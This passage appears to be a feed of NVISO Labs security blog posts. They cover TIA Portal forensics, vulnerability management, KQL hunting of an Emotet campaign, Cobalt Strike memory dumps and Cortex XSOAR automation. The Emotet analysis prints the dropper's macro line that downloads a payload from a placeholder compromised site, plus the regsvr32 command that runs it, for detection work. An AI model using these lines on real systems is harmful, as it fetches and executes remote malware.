The “LoadService” node is a neighbour of the “ProjectSettings” and the “General” node. It contains child nodes named after the full path of projects. As shown above, the child nodes given an ID as name, like we already saw within the “ConnectionServices” section.

Content

List of projects that were worked on within the TIA Portal.

Behaviour
  • The content of this node and its child’s is not affected when the TIA Portal is opened and closed without opening a project.
  • The content of this node and its child’s is not affected if a project is removed from the recently used projects in the TIA Portal.
  • A project will only show up under “LoadServices” if a PLC is added to the project and configuration is done to communicate with the PLC, like setting an IP-Address to its interface.
  • According to our testing, the child nodes of a project node under “LoadServices” are not randomly named and behave the same way as mentioned in the “ConnectionServices” section. The screenshot above shows the same PLC added to two different projects. The name does not match with the named assigned for a PLC in the “ConnectionServices” node section.
  • If a PLC is removed from a project, the corresponding child node under “LoadService” is not removed.
  • If a complete project, with PLCs configured is copied to a different location on the same machine, opened and an interaction to the PLC is initiated with the “go online” function, no additional entry in the “LoadService” section for the copied project is created. If the IP-Address configuration for the PLC is changed in the project, an entry will be created though.  At the moment it is unclear why this happens. A theory could be that the configuration of the IP-Address creates the entry and the first interaction with the PLC just updates the entry if it exists. If it does not find a matching entry nothing is done.

Tool

Manually searching in .xml files and highlighting the important notes is a cumbersome process. In order to provide some help for extracting the interesting parts of a “Settings.xml” file I took the liberty and created a small python tool. You can download the tool from my GitHub repository.

By invoking it with the command below, the discussed nodes are extracted:

python3 ./parse_tSettings.py -f PATH_TO_SETTINGS.XML

Figure 9: Sample output of parse_tSettings.py

At the end of this second blog post some general notes on the “Settings.xml” file. This file belongs to the user, no additional privileges would be needed to change or delete the file. If you delete the file and start the TIA Portal, it will automatically create a fresh “Settings.xml” file. So it seems pretty easy to manipulate or clean this file. Still the user (or the adversary) first needs to be aware that this file exists and which information it stores! The file is written as part of the tasks performed when the TIA Portal is closed normally. If the TIA portal crashes, or the process get killed by other means, the file will not be updated.

Conclusion & Outlook

In this second part we have shown that the “Settings.xml” does store valuable information and should be considered when analysing machines running the TIA portal. Further we have introduced a free tool to extract this data and as a small bonus a KAPE target to collect the “Settings.xml” file.

In the third part of this series of blog posts, we will have a look at what data we can extract from projects created with the TIA Portal.

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all out future research and publications.

✇ NVISO Labs

Vulnerability Management in a nutshell

By: Michiel Jonkmans

Introduction

Vulnerability Management plays an important role in an organization’s line of defense. However, setting up a Vulnerability Management process can be very time consuming. This blogpost will briefly cover the core principles of Vulnerability Management and how it can help protect your organization against threats and adversaries looking to abuse weaknesses.

What is Vulnerability Management

To better understand Vulnerability Management, it is important to know what it stands for. On the internet, Vulnerability Management has several definitions. Sometimes these can be confusing and misinterpreted because different wording is used across several platforms. Several products exist that can assist an organization in creating a Vulnerability Management Process. Some of the current market leaders include but are not limited to: CrowdStrike, Tenable.IO and Rapid7.

According to Tenable, Vulnerability Management is an ongoing process that includes proactive asset discovery, continuous monitoring, mitigation, remediation and defense tactics to protect your organization’s modern IT attack surface from Cyber Exposure.[1]

According to Rapid7, Vulnerability Management is the process of identifying, evaluating, treating, and reporting on security vulnerabilities in systems and the software that runs on them. This, implemented alongside with other security tactics, is vital for organizations to prioritize possible threats and minimizing their attack surface.[2]

According to CrowdStrike, Vulnerability Management means the ongoing, regular process of identifying, assessing, reporting on, managing and remediating security vulnerabilities across endpoints, workloads, and systems. Typically, a security team will leverage a Vulnerability Management tool to detect vulnerabilities and utilize different processes to patch or remediate them.[3]

Why Vulnerability Management

A well-defined Vulnerability Management process can be leveraged to decrease the cyber exposure of an organization. This ranges from identifying open RDP ports on internet-facing Shadow IT to outdated third-party software installed on the domain controller. In case vulnerabilities are abused by attackers, they could obtain access to the internal network, distribute malware such as Ransomware, obtain sensitive information and the list goes on. Decreasing your exposure and increasing patch management can reduce the likelihood of an attack happening on the organization’s infrastructure.

Vulnerability Management core principles

If we take a look at the definitions above, several terms are being used over and over again. We can summarize Vulnerability Management in 6 steps. As Vulnerability Management is a continuous process, each individual step provides input for subsequent steps. It is important to note that this is a simplified version of Vulnerability Management. The following image illustrates what a Vulnerability Management process can look like:

Figure 1 – Vulnerability Management Process

Identify

Identification of the scope is the first part of the Vulnerability Management cycle. This is an important phase, as you can’t protect what you don’t know. If we take a look at the CIS Critical Security Controls[4], the first step to stop today’s most pervasive and dangerous attacks is to “Actively manage (inventory, track, and correct) all enterprise assets“ – meaning that it is really important for an organization to know what infrastructure they have. The first step in the Vulnerability Management program is to identify all known and unknown assets and start prioritizing them. This can include but is not limited to the following information:

  • Which assets are most critical to the business?
  • Which assets are externally exposed?
  • Which assets have confidential information?

The process of identifying assets can be automized with a combination of discovery scans on the internal network and identification of known and unknown external assets through attack surface management platforms. This phase is a crucial part, as all next steps are based on the scope defined during the identification phase.


Assess

Assessing the infrastructure for weaknesses can be automated through vulnerability scanning with known scanners such as Tenable.IO and Rapid7 However, manual verification might be needed to determine the actual exploitability of vulnerabilities as vulnerability scanners do not cover all security controls in place such as specific workarounds that were implemented to limit the likelihood of exploitation. By using a combination of automated scanners and manual verification of the issues, a comprehensive view on what vulnerabilities are currently affecting your organization can be established.

Prioritize

Some organizations might not prioritize their vulnerabilities obtained by automatic scanners or penetration tests. However, as Seth Godin said: “Data is not useful until it becomes information”. It is the task of the Vulnerability Management team to prioritize the vulnerabilities not only on their actual technical impact but also to keep in mind the business impact. For example, a critical Log4J vulnerability on an externally available and well-known website should be remediated sooner that the same Log4J vulnerability on a lunch-serving testing server that is only accessible from the internal network.

Report

After all issues have been prioritized, an actionable report should be given to the teams that will actually perform the patching/resolving of the issues. It is important for the Vulnerability Management team to keep in mind that they should create actionable tickets or remediating actions for the operations team. A bad example of a ticket can be as follows:

Title: Log4J identified

Description: Log4J was identified on your server

Resolution: Please fix this as soon as possible

A good example of a ticket can be something like this[5]:

Title: Apache Log4j Remote Code Execution (Log4Shell)

Severity: Critical

Estimated Time to Fix: 1 hour

Description: Apache Log4j is an open source Java-based logging framework leveraged within numerous Java applications. Apache Log4j versions 2.0-beta9 to 2.15.0 suffer from insufficient protections on message lookup substitutions when dealing with user controlled input. By crafting a malicious string, an attacker could leverage this issue to achieve a remote code execution on the Log4j instance used by the target application.

Solution: Upgrade Apache to version 2.16.0 or later.

Affected devices: 10.0.0.3, 10.0.9.3

CVE’s: CVE-2021-44228

References: https://logging.apache.org/log4j/2.x/security.html


Remediate

Resolving vulnerabilities should be the goal of the entire Vulnerability Management process, as this will decrease the exposure of your organization. Remediation is a process on its own and might consist of automatic patching, process updates, Group Policy updates, …. With the actionable ticketing performed by the Vulnerability Management team in the previous phase, it should be easy for the operations teams to identify what actions need to be done and how long it will take. After successful remediation, a validation of the remediation should be performed by the Vulnerability Management team. If the issue is resolved, the issue can be closed.

Improve

As Vulnerability Management is a continuous process, it should be reviewed all the time. A Vulnerability Management program was like Rome not built in one day. However, over time a robust and reliable Vulnerability Management process will be in place if the processes are well defined and known within the organization.


[1] https://www.tenable.com/source/vulnerability-management

[2] https://www.rapid7.com/fundamentals/vulnerability-management-and-scanning/

[3] https://www.crowdstrike.com/cybersecurity-101/vulnerability-management/

[4] https://www.cisecurity.org/controls

[5] https://www.tenable.com/plugins/was/113075

✇ NVISO Labs

Hunting Emotet campaigns with Kusto

By: bparys

Introduction

Emotet doesn’t need an introduction anymore – it is one of the more prolific cybercriminal gangs and has been around for many years. In January 2021, a disruption effort took place via Europol and other law enforcement authorities to take Emotet down for good. [1] Indeed, there was a significant decrease in Emotet malicious spam (malspam) and phishing campaigns for the next few months after the takedown event.

In November 2021 however, Emotet had returned [2] and is once again targeting organisations on a global scale across multiple sectors.

Starting March 10th 2022, we detected a massive malspam campaign that delivers Emotet (and further payloads) via encrypted (password-protected) ZIP files. The campaign continues as of writing of this blog post on March 23rd, albeit it appears the campaign is lowering in frequency. The campaign appears to be initiated by Emotet’s Epoch4 and (mainly) Epoch5 botnet nodes.

In this blog post, we will first have a look at the particular Emotet campaign, and expand on detection and hunting rules using the Kusto Query Language (KQL).

Emotet Campaign

The malspam campaign itself has the following pattern:

  1. An organisation’s email server is abused / compromised to send the initial email
  2. The email has a spoofed display name, purporting to be legitimate
  3. The subject of the email is a reply “RE:” or forward “FW:” and contains the recipient’s email address
  4. The body of the email contains only a few single sentences and a password to open the attachment
  5. The attachment is an encrypted ZIP file, likely an attempt to evade detections, which in turn contains a macro-enabled Excel document (.XLSM)
  6. The Excel will in turn download the Emotet payload
  7. Finally, Emotet may download one of the next stages (e.g. CobaltStrike, SystemBC, or other malware)

Two examples of the email received can be observed in Figure 1. Note the target email address in the subject.

Figure 1 – Two example malspam emails

We have observed emails sent in multiple languages, including, but not limited to: Spanish, Portuguese, German, French, English and Dutch.

The malspam emails are typically sent from compromised email servers across multiple organisations. Some of the top sending domains (based on country code) observed is shown in Figure 2.

Figure 2 – Top sender (compromised) email domains

The attachment naming scheme follow a somewhat irregular pattern: split between text and seemingly random numbers, again potentially to evade detection. A few examples of attachment names that are prepended is shown in Figure 3.

Figure 3 – Example attachment names

After opening the attachment with password provided (typically a 3-4 character password), an Excel file with the same name as the ZIP is observed. When opening the Excel file, we are presented with the usual banner to Enable Macros to make use of all features, as can be seen in Figure 4.

Figure 4 – Low effort Excel dropper

Enabling macros, via an XLM4.0 macro and hidden sheet or cell happens as follows:

=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://<compromised_website>/0Rq5zobAZB/", "..\wn.ocx")

And will then result in regsvr32 downloading and executing an OCX file (DLL):

C:\Windows\SysWow64\regsvr32.exe -s ..\en.ocx

This OCX file is in term the Emotet payload. Emotet can then, as mentioned, either leverage one of its modules (plugins) for data exfiltration, or download the next malware stage as part of its attack campaign.

We will not analyse the Emotet malware itself, but rather focus on how to hunt several parts of the stage using the Kusto Query Language (KQL) in environments that make use of Office 365.

Hunting with KQL

Granted you are ingesting the right logs (license and setup) and have the necessary permissions (Security Reader will suffice), visit the Microsoft 365 Defender Advanced Hunting’s page and query builder: https://security.microsoft.com/v2/advanced-hunting

Query I – Hunting the initial campaign

First, we want to track the scope and size of the initial Emotet campaign. We can build the following query:

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip"
| join kind=inner (EmailEvents | where Subject contains RecipientEmailAddress and DeliveryAction == "Delivered" and EmailDirection == "Inbound") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

The query above focuses on Step 3 of this campaign: The subject of the email is a reply “RE:” or forward “FW:” and contains the recipient’s email address. In this query, we filter on:

  1. Any email that has a ZIP attachment;
  2. Where the subject contains the recipient’s email address;
  3. Where the email direction is inbound and the mail is delivered (so not junked or blocked).

This yields 22% of emails that have been delivered – the others have either been blocked or junked. However, we know that this campaign is larger and might have been more successful.

Meaning, we need to improve our query. We can now create an improved query like below, where the sender display name has an alias (or is spoofed):

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound" and DeliveryAction == "Delivered") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

This query now results in 25% of emails that have been delivered, for the same timespan (campaign scope & size) as set before. The query can now further be finetuned to show all emails except the blocked ones. Even when malspam or phishing emails are Junked, the user may manually go to the Junk Folder, open the email / attachment and from there get compromised.

The final query:

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound" and DeliveryAction != "Blocked") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

This query now displays 73% of the whole Emotet malspam campaign. You can now export the result, create statistics and blocking rules, notify users and improve settings or policies where required. An additional user awareness campaign can help to stress that Junked emails should not be opened when it can be avoided.

As an extra, if you merely want to create statistics on Delivered versus Junked versus Blocked, the following query will do just that:

EmailAttachmentInfo
| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress
| summarize Count = count() by DeliveryAction

Query II – Filtering on malspam attachment name

This query is of lower fidelity than others in this blog, as it can produce a large number of False Positives (FPs), depending on your organisations’ geographical location and amount of emails received. Nevertheless, it can be useful to run the query and build further on it – creating a baseline. The query below displays an extract of subjects from Table 1 and according hunt:

let attachmentname = dynamic(["adjunto","adjuntos","anhang","archiv","archivo","attachment","avis","aviso","bericht","comentarios","commentaires","comments","correo","data","datei","datos","detail","details","detalle","doc","document","documentación","documentation","documentos","documents","dokument","détails","escanear","fichier","file","filename","hinweis","info","informe","list","lista","liste","mail","mensaje","message","nachricht","notice","pack","paquete","pièce","rapport","report","scan","sin titulo","untitled"]);
EmailAttachmentInfo
| where FileName has_any(attachmentname) and strlen(FileName) < 20 and FileType == "zip"
| join EmailEvents on NetworkMessageId
| where DeliveryAction == "Delivered" and EmailDirection == "Inbound"

Running this rule delivers a considerable amount of results, even when applying the string length (strlen) to be less than 20 characters as we have observed in this campaign. Finetune the query, we can add one more line to filter on display name as we have also created in Query I:

let attachmentname = dynamic(["adjunto","adjuntos","anhang","archiv","archivo","attachment","avis","aviso","bericht","comentarios","commentaires","comments","correo","data","datei","datos","detail","details","detalle","doc","document","documentación","documentation","documentos","documents","dokument","détails","escanear","fichier","file","filename","hinweis","info","informe","list","lista","liste","mail","mensaje","message","nachricht","notice","pack","paquete","pièce","rapport","report","scan","sin titulo","untitled"]);
EmailAttachmentInfo
| where FileName has_any(attachmentname) and strlen(FileName) < 20 and FileType == "zip" and SenderDisplayName startswith_cs "<"
| join EmailEvents on NetworkMessageId
| where DeliveryAction == "Delivered" and EmailDirection == "Inbound"

This now results in 20% True Positives (TP) as opposed to the original query, where we would have needed to filter extensively. Note this query can be further adopted to your needs, for example, you could remove the SenderDisplayName parameter again, and set other parameters (e.g. string length, email language, …).

Query III – Searching for regsvr32 doing bad things

Most detection & hunting teams, Security Operation Center (SOC) analysts, incident responders and so on will be acquainted with the term “lolbins”, also known as living off the land binaries. In short, any binary that is part of the native Operating System, in this case Windows, and which can be abused for other purposes than what it is intended for.

In this case, regsvr32 is leveraged – it is typically used by attackers to – you guessed it – register and execute DLLs! The query below will leverage a simple regular expression (regex) to hunt for execution of regsvr32 attempting to run an OCX file, as was seen in this Emotet campaign.

DeviceProcessEvents
| where FileName =~ "regsvr32.exe" and ProcessCommandLine matches regex @"\.\.\\.+\.ocx$"

Conclusion

Emotet is still a significant threat to be reckoned with since its return near the end of last year.

This blog post focused on dissecting Emotet’s latest malspam campaign as well as creating hunting queries using KQL to hunt for and respond to any potential security incident. The queries can also be converted to other formats (e.g. Splunk Query Language using https://uncoder.io/ for example) to allow for broader hunting efforts or where using KQL might not be an option.

Thanks to my colleague Maxime Thiebaut (@0xthiebaut) for assistance in building the queries.

About the author

Bart Parys Bart is a manager at NVISO where he mainly focuses on Threat Intelligence, Incident Response and Malware Analysis. As an experienced consumer, curator and creator of Threat Intelligence, Bart loves to and has written many TI reports on multiple levels such as strategic and operational across a wide variety of sectors and geographies. Twitter: @bartblaze
✇ NVISO Labs

Cobalt Strike: Overview – Part 7

By: didiernviso

This is an overview of a series of 6 blog posts we dedicated to the analysis and decryption of Cobalt Strike traffic. We include videos for different analysis methods.

In part 1, we explain that Cobalt Strike traffic is encrypted using RSA and AES cryptography, and that we found private RSA keys that can help with decryption of Cobalt Strike traffic

In part 2, we actually decrypt traffic using private keys. Notice that one of the free, open source tools that we created to decrypt Cobalt Strike traffic, cs-parse-http-traffic.py, was a beta release. It has now been replaced by tool cs-parse-traffic.py. This tool is capable to decrypt HTTP(S) and DNS traffic. For HTTP(S), it’s a drop-in replacement for cs-parse-http-traffic.py.

In part 3, we use process memory dumps to extract the decryption keys. This is for use cases where we don’t have the private keys.

In part 4, we deal with some specific obfuscation: data transforms of encrypted traffic, and sleep mode in beacons’ process memory.

In part 5, we handle Cobalt Strike DNS traffic.

And finally, in part 6, we provide some tips to make memory dumps of Cobalt Strike beacons.

The tools used in these blog post are free and open source, and can be found here.

Here are a couple of videos that illustrate the methods discussed in this series:

YouTube playlist “Cobalt Strike: Decrypting Traffic

Blog posts in this series:

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Cortex XSOAR Tips & Tricks – Tagging War Room Entries

By: wstinkens

Introduction

The war room in Cortex XSOAR incidents allows a SOC analyst to do additional investigations by using any command available as an automation or integration command. It also contains the output of all tasks used in playbooks (if not in Quiet mode). In this blogpost we will show you how to format output of automations to the war room using the CommandResults class in CommonServerPython, how to add tags to this output and what you can do with these tags.

To support creating tagged war room entries in automations, we have created our own nitro_return_tagged_command_results function which is available on the NVISO Github:

https://github.com/NVISOsecurity/blogposts/blob/master/CortexXSOAR/nitro_return_tagged_command_results.py

CommandResults

The CommonServerPython automation in Cortex XSOAR contains common Python functions and classes created by Palo Alto that are used in multiple built-in automations. They are appended to the code of each integration/automation before being executed.

One of these classes is CommandResults. Together with the return_results function, it can be used to return (formatted) output from an automation to the war room or context data:

results = [
    {
        'FileName': 'malware.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Detected'
    },
    {
        'FileName': 'evil.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Prevented'
    }
]
title = "Malware Mitigation Status"

command_result = CommandResults(readable_output=tableToMarkdown(title, results, None, removeNull=True),
        outputs_prefix=title,
        outputs=results
    )

return_results(command_result)

By using the outputs_prefix and outputs attributes of the CommandResult class, the following data is created in the Context Data:

By using the readable_output attributes of the CommandResult class, the following entry to the war room is created:

By using the actions menu of the war room entry, you can manually add tags:

nitro_return_tagged_command_results()

The functionality to add tags to war room entries is not available in the return_results function in CommonServerPython, so we created a nitro_return_tagged_command_result function which supports adding tags:

def nitro_return_tagged_command_results(command_result: CommandResults, tags: list):
    """
    Return tagged CommandResults

    :type command_result: ``CommandResults``
    :param command_result: CommandResults object to output with tags
    :type tags: ``list``
    :param tags: List of tags to add to war room entry

    """
    result = command_result.to_context()
    result['Tags'] = tags

    demisto.results(result)

This function allow you to provide tags which will be automatically added to the war room entry:

results = [
    {
        'FileName': 'malware.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Detected'
    },
    {
        'FileName': 'evil.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Prevented'
    }
]
tags_to_add = ['evidence', 'malware']
title = "Malware Mitigation Status"

command_result = CommandResults(
        readable_output=tableToMarkdown(title, results, None, removeNull=True),
    )

nitro_return_tagged_command_results(command_result=command_result, tags=tags_to_add)

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_return_tagged_command_results in all your custom automations.

Using Entry Tags

Now that you have created tagged war room entries from an automation, what can you do with this?

We use these tagged war room entries to automatically add output from automations as evidence to the incident Evidence Board. The Evidence board can be used by the analyst to store key artifacts for current and future analysis.

First we use the getEntries command to search the war room for the entries with the “evidence” tag.

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

Then we get the entry IDs from the results of getEntries:

entry_ids = [result.get('ID') for result in results]

Finally we loop through all entry IDs of the tagged war room entries and use the AddEvidence command to add them to the evidence board:

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': 'Example Evidence'})

The tagged war room entry will now be added to the Evidence Board of the incident:

References

https://docs.paloaltonetworks.com/cortex/cortex-xsoar/6-1/cortex-xsoar-admin/incidents/incident-management/war-room-overview.html

https://xsoar.pan.dev/docs/playbooks/playbook-settings

https://xsoar.pan.dev/docs/reference/api/common-server-python

https://xsoar.pan.dev/docs/integrations/code-conventions#commandresults

https://xsoar.pan.dev/docs/integrations/code-conventions#return_results

https://xsoar.pan.dev/docs/reference/scripts/common-server-user-python

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can reach Wouter via his LinkedIn page.


Want to learn more about SOAR? Sign- up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.
https://forms.office.com/r/dpuep3PL5W

✇ NVISO Labs

Investigating an engineering workstation – Part 1

By: Olaf Schwarz

In this series of blog posts we will deal with the investigation of an engineering workstation running Windows 10 with the Siemens TIA Portal Version 15.1 installed. In this first part we will cover some selected classic Windows-based evidence sources, and how they behave with regards to the execution of the TIA Portal and interaction with it. The second part will focus on specific evidence left behind by the TIA Portal itself and how to interpret it. Extracting information from a project and what needs to be considered to draw the right conclusions from this data will be the focus of the third post. Last but not least we will look at the network traffic generated by the TIA portal and what we can do in case the traffic is not being dissected nicely by Wireshark.

For the scope of this series of blog posts we look at the Siemens TIA (Totally Integrated Automation) Portal as the software you can use to interact with, and program PLCs. This is a simplified view, but it is sufficient to follow along with the blog posts. A PLC, or Programmable Logic Controller, can be viewed as a specially designed device to control industrial processes, like manufacturing, energy production and distribution, water supply and much more.  The Siemens Siematic S7-1200, we will mention later in this series, is just one example of the many representatives of this family.

If you approach your first engagement looking at a Windows system running the TIA Portal, you might have the same thought as I had: “Will some of the useful evidences, which I know and used in  other Windows-based investigations, be there waiting to be unearthed?” Since it is always better to know such things before an actual incident takes place, we will cover some of the more standard evidences and how they behave in regards of the TIA Portal. Please note, we will not elaborate on the back and forth of every Windows-based evidence we mention, as this is not meant to be a blog post explaining standard evidence.

Evidence of Execution is available as you would expect. If you know what to look for, it perhaps helps in forming answers faster and more precise.

The Prefetch artifact, if enabled on the system, would be written for “SIEMENS.AUTOMATION.PORTAL.EXE” and can be parsed like any other prefetch file. Additionally, the prefetch file for “SIEMENS.AUTOMATION.DIAGNOSTIC” also gets written or updated when the TIA Portal is started. If we have a look at the ShimCache (aka AppCompatCache) we can try to find the last time of execution by investigating the SYSTEM registry hive. In case of newer Windows systems, like in our example a Windows 10 system, you are out of luck in regards of the last time of execution. It is no longer recorded.

Investigating a Windows 10 system and having the System registry hive already open, the BAM key (ControlSet00x\Services\bam\State\UserSettings\$SID) will provide us with information on date and time for application execution. Knowing the executable name (“Siements.Automation.Portal.exe”) and using it in a simple search quickly reveals the information we are looking for.

Reviewing more user related evidence, by analyzing the NTUser.dat for the user accounts in scope of the investigation, leads us to the UserAssist key. Reviewing the subkeys starting with: “CEBFF5CD…” and “F4E57C4B…” will give us the expected information, like run count, last executed time and so on. Just make sure you are looking into the correct values for each subkey. In the subkey starting with “F4E57C4B…” it is shortcuts we are looking into. In our installation the .lnk files are named “TIA Portal V15.1.lnk”, which is the default value, as it was not renamed by us.

Figure 1: TIA Portal related content in UserAssist Subkey “F4E57C4B…”

For the second subkey (“CEBFF5D…”) we are looking at the executables, so the actual executable name is what we should search for.

Figure 2: TIA Portal related content in UserAssist Subkey “CEBFF5D…”

But what about finding projects that have been present or opened on the machine you are investigating?

First of all we should have an idea how a project looks like. Usually it is not a single file, instead it is a structure of multiple folders and subfolders. Furthermore it contains a file in the root directory of the project folder which you are using to open the project in the TIA Portal. The file extension of these files changes with the Version of the TIA Portal: “.apVERSION” is the current schema. This would mean, a file created with the TIA Portal Version 15.1 will have “ap15_1” as file extension, if created with TIA Portal Version 13 it will be “ap13” as file extension.  

The following screenshot shows the file extensions which can be opened with the TIA Portal Version 15.1 and provides further examples of the naming schema.

Figure 3: TIA Portal Version 15.1 supported file extensions

Below you can see an overview of the files and the directory structure of a test project, in our case created with Version 15.1 of the TIA Portal:

Figure 4: Example listing of a test project created with TIA Portal V15.1

Equipped with this information we can check if and how the “.ap15_1” extension show up in classic file use and knowledge artefacts.

Reviewing the recent files for a user, by investigating the RecentDocs key in the corresponding NTUSER.dat hive shows a subkey for the “.ap15_1” extension.

Figure 5: RecentDocs subkey for .ap15_1 file extension
Figure 6: Example content of RecentDocs subkey for .ap15_1 file extension

The second screenshot shows an excerpt of the “.ap15_1” key parsed by Registry Explorer. Please note, that if a project file is opened via the “Recently used” projects listing, shown on the starting view of the TIA Portal, the RecentDocs key is not updated.

Figure 7: TIA Portal view to open recently used projects

While we are dealing with user specific evidence, we can also check if Jump Lists are available as we would expect. We can use the tool JLECmd by Erik Zimmermann to parse all Jump Lists and review the results in Timeline Explorer. By applying a filter to only show files ending with “.ap” we get the overview shown below.

Figure 8: Jump Lists entries showing .ap15_1 files

Here you can clearly see that we can parse out entries related to “.ap15_1” files for “Quick Access” and also for an App Id not known to JLECmd. This App Id is related to the TIA Portal and we can now also identify the automatic destinations file to open or parse the specific file if we want or need. It will be “4c28c7c161e44256.automaticDestinations-ms”, in our case stored under “C:\Users\nviso\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations”.  If a project is created and saved in the TIA Portal it will not show up in the Jump List. Further if you choose to open a project from the “Recently used” projects list, like described above, the Jump List of the TIA Portal will not be changed.

Figure 9: TIA Portal Recently used projects vs. Jump List

In figure 9 we demonstrated the potential differences between the Jump List (1.) and the “Recently used” projects in the TIA Portal (2.). Obviously the two most recent projects listed by the TIA Portal are missing in the Jump List. The “testproject12.ap15_1” file relates to an already existing project opened via the TIA Portal functionality and the “Pro_dev_C64_blast” project was created via the TIA Portal. The content of the Jump List is shown via the Windows Start menu in this example. Reviewing the Jump List with JLECmd validates these results.

The OpenSaveMRU, also user account specific evidence, is another a place where we can look for the “.ap*” file extension and review activity. Opening the NTUSER.dat for the user account in focus and following the path down to the “OpenSavePidlMRU” key already shows the subkey for a file extension of interest. As always you need to be aware of the evidence you are looking at, the OpenSaveMRU is maintained by the Windows shell dialog box, projects will be showing up here based on if they are opened or saved via the dialog box or not. Double-clicking a “.ap15_1” file will not make it show up here, luckily for us we have the Jump List and the “RecentDocs” key mentioned above.  Also note, that opening a project via the “Recently used” projects lists of the TIA Portal, mentioned above in the section discussing “RecentDocs”, will not change the OpenSaveMRU.

Figure 10: OpenSaveMRU key containing subkeys for ap15_1 files

Needless to say that you can also search the $MFT for files with the extension of interest.

A few things need to be mentioned in regards of managing expectations:

  • The evidence produced by the Windows Operating System or the TIA Portal is not there for forensic or incident response investigations. It usually servers a different purpose than we are using it for. That being said, it should be understood that evidence might behave completely different after software updates or in older/newer versions of the software.
  • Further it is not guaranteed that the software will produce the same evidence in any imaginable edge case.
  • The blog posts are based on our observations and testing results.

Conclusion & Outlook

The standard evidences on a Windows System can already bring some good insights into activities around the TIA Portal. However, we must be aware that the TIA Portal offers its own functions for opening and creating projects, which do not update the jump list, for example. For these cases we can review the “Settings.xml” file. We will focus on the “Settings.xml” file and information we can get out of raw project files in the upcoming blog posts.

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all out future research and publications.

✇ NVISO Labs

Cobalt Strike: Memory Dumps – Part 6

By: didiernviso

This is an overview of different methods to create and analyze memory dumps of Cobalt Strike beacons.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In part 3, we explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump. In part 4, we deal with traffic obfuscated with malleable C2 data transforms. And in part 5, we deal with Cobalt Strike DNS traffic.

For some of the Cobalt Strike analysis methods discussed in previous blog posts, it is useful to have a memory dump: either a memory dump of the system RAM, or a process memory dump of the process hosting the Cobalt Strike beacon.

We provide an overview of different methods to make and/or use memory dumps.

Full system memory dump

Several methods exist to obtain a full system memory dump of a Windows machine. As most of these methods involve commercial software, we will not go into the details of obtaining a full memory dump.

When you have a full system memory dump that is uncompressed, the first thing to check, is for the presence of a Cobalt Strike beacon in memory. This can be done with tool 1768.py, a tool to extract and analyze the configuration of Cobalt Strike beacons. Make sure to use a 64-bit version of Python, as uncompressed full memory dumps are huge.

Issue the following command:

1768.py -r memorydump

Example:

Figure 1: Using 1768.py on a full system memory dump

In this example, we are lucky: not only does 1768.py detect the presence of a beacon configuration, but that configuration is also contained in a single memory page. That is why we get the full configuration. Often, the configuration will overlap memory pages, and then you get a partial result, sometimes even Python errors. But the most important piece of information we get from this command, is that there is a beacon running on the system of which we took a full memory dump.

Let’s assume that our command produced partial results. What we have to do then, to obtain the full configuration, is to use Volatility to produce a process memory dump of the process(es) hosting the beacon. Since we don’t know which process(es) hosts the beacon, we will create process memory dumps for all processes.

We do that with the following command:

vol.exe -f memorydump -o procdumps windows.memmap.Memmap -dump

Example:

Figure 2: using Volatility to extract process memory dumps – start of command
Figure 3: using Volatility to extract process memory dumps – end of command


procdumps is the folder where all process memory dumps will be written to.

This command takes some time to complete, depending on the size of the memory dump and the number of processes.

Once the command completed, we use tool 1768.py again, to analyze each process dump:

Figure 4: using 1768.py to analyze all extracted process memory dumps – start of command
Figure 4: using 1768.py to analyze all extracted process memory dumps – detection for process ID 2760

We see that file pid.2760.dmp contains a beacon configuration: this means that the process with process ID 2760 hosts a beacon. We can use this process memory dump if we would need to extract more information, like encryption keys for example (see blog post 3 of this series).


Process memory dumps
Different methods exist to obtain process memory dumps on a Windows machine. We will explain several methods that do not require commercial software.

Task Manager
A full process memory dump can be made with the built-in Windows’ Task Manager.
Such a process memory dump contains all the process memory of the selected process.

To use this method, you have to know which process is hosting a beacon. Then select this process in Task Manager, right-click, and select “Create dump file”:

Figure 6: Task Manager: selecting the process hosting the beacon
Figure 7: creating a full process memory dump


The process memory dump will be written to a temporary folder:

